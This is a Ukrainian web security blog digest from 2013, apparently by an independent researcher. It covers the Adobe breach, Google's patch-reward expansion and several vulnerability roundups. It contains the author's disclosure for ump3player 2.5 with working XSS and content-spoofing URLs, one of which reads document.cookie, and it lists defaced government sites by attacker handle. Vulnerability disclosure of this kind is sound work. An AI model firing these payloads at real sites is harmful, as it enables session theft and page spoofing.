Websecurity - Веб безпека

За повідомленням bugtraq.ru, великий взлом Adobe.

Нещодавно Adobe повідомила про взлом своєї мережі, результатом якого стала компрометація майже трьох мільйонів (2,9 млн.) користувацьких акаунтів. Інформація, що витекла, включає імена користувачів, зашифровані паролі, зашифровані номери кредиток. Паролі даних користувачів скинуті, їм вислані відповідні попередження.

Взломщики також одержали доступ до вихідного коду Adobe Acrobat, ColdFusion, ColdFusion Builder та інших продуктів.

Враховуючі дірявість клієнтських та серверних програмних продуктів компанії Adobe (в тому числі я сам знаходив уразливості в їхніх програмах), то зовсім не дивно, що їх взломали.

За повідомленням www.xakep.ru, хакери зберігали код програм Adobe на відкритому сервері.

Невідомим хакерам, потенційно російського походження, на минулому тижні вдалося викрасти вихідні коди програм Adobe, у тому числі платформи розробки веб додатків ColdFusion. Але іноді і вони роблять помилки. Фахівець з безпеки Алекс Холден знайшов вихідні коди на відкритому сервері в Інтернеті. Хоча файл був зашифрований, але все рівно така безтурботність ні до чого.

Компанія Adobe повідомила про взлом 3 жовтня. Крім вихідних кодів, були скомпрометовані також 2,9 млн. номерів платіжних карт користувачів та інші платіжні реквізити.

За повідомленням www.opennet.ru, Google буде виплачувати винагороди за підвищення безпеки популярного вільного ПЗ.

Компанія Google оголосила про розширення дії програми по виплаті винагород за надання інформації про наявність уразливостей у браузері Chrome, компонентах Chrome OS і веб сервісах Google. Відтепер винагороду зможуть одержати також дослідники безпеки, що працюють в області підвищення безпеки популярного мережевого і системного вільного ПЗ, а також розповсюджених відкритих бібліотек.

При цьому винагороди будуть виплачуватися не тільки за виявлення факту наявності уразливостей, але і за створення покращень, що перешкоджають виникненню проблем з безпекою й попереджують появу потенційних уразливостей. Розмір винагороди складе від $500 до $3133,70 у залежності від складності, якості і важливості запропонованих змін.

У вересні, 24.09.2013, під час аудиту безпеки я знайшов Information Leakage уразливості на одному сайті ПриватБанка, що призводять до витоку персональних даних клієнтів. А у жовтні знайшов аналогічні витоки інформації на інших сайтах українських компаній, що надають подібні послуги. При тому, що на деяких подібних сайтах, якими я найбільше користуюся, таких витоків немає (тобто це залежить від їх відношення до персональних даних).

Перелік конкретних сайтів, що дозволяють витоки персональних даних, оприлюдню пізніше. Про дані уразливості я вже повідомив ПриватБанк і найближчим часом сповіщу адміністрацію інших сайтів.

Детальна інформація про уразливості з’явиться пізніше.

12.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в mp3-player. Про що вже повідомив розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

XSS (Strictly social XSS) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Уразливі mp3-player 2.5 та попередні версії.

Продовжуючи розпочату традицію, після попереднього відео про виконання коду в Adobe Flash Player, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

Internet Explorer Exploit (v.6-11) - SetMouseCapture Use-After-Free [CVE-2013-3893]

В даному відео ролику демонструється віддалене виконання коду в Internet Explorer версій 6-11. Використовується експлоіт для проведення атаки на уразливість в Internet Explorer (показано на прикладі IE9) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером. Це свіжа дірка в Internet Explorer, саме відео записане 02.10.2013.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Виявлені численні уразливості безпеки в Apple Safari.

Уразливі версії: Safari 5.1.

Пошкодження пам’яті.

• APPLE-SA-2013-09-12-2 Safari 5.1.10 (деталі)

В даній добірці експлоіти в веб додатках:

• TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF (деталі)
• Good for Enterprise 2.2.2.1611 - XSS Vulnerability (деталі)
• Linksys WRT110 Remote Command Execution Vulnerability (деталі)
• CA BrightStor ARCserve Tape Engine 0×8A Buffer Overflow Vulnerability (деталі)
• PCMAN FTP Server Post-Authentication STOR Command Buffer Overflow (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mukioplayer, Design-Approval-System та Simple Dropbox. Для котрих з’явилися експлоіти. Mukioplayer - це медіа плеєр, Design-Approval-System - це плагін для розгляду дизайнів, Simple Dropbox - це плагін для інтеграції з Dropbox.

• WordPress Mukioplayer 1.6 SQL Injection (деталі)
• WordPress Design-Approval-System 3.6 Cross Site Scripting (деталі)
• WordPress Simple Dropbox 1.8.8 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Виявлений слабкий PRNG-генератор в Perl Crypt::DSA.

Уразливі продукти: Crypt::DSA 1.17 модуль для Perl.

За певних умов використовується слабкий генератор.

• Vulnerability in perl-Crypt-DSA (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dec.gov.ua (хакером HighTech) - 04.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://book.rekord.gov.ua (хакером SultanHaikal) - 06.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://kievlyanenews.com.ua (хакером dr.m1st3r)
• http://веселка.com.ua (хакером dr.m1st3r)
• http://blog.arhstudio-f.com (хакером dr.m1st3r)

В даній добірці уразливості в веб додатках:

• Polycom - Command Shell Grants System-Level Access (деталі)
• vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities (деталі)
• Polycom - Firmware Update Command Injection (деталі)
• SilverStripe(R) Information Exposure Through Query Strings in GET Request (CWE-598) (деталі)
• Polycom - H.323 CDR Database SQL Injection (деталі)
• Joomla core <= 3.1.5 reflected XSS vulnerability (деталі)
• Polycom - H.323 Format String Vulnerability (деталі)
• Vulnerabilities in owncloud (деталі)
• HP XP P9000 Command View Advanced Edition Suite Products, Remote Disclosure of Information (деталі)
• Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities (деталі)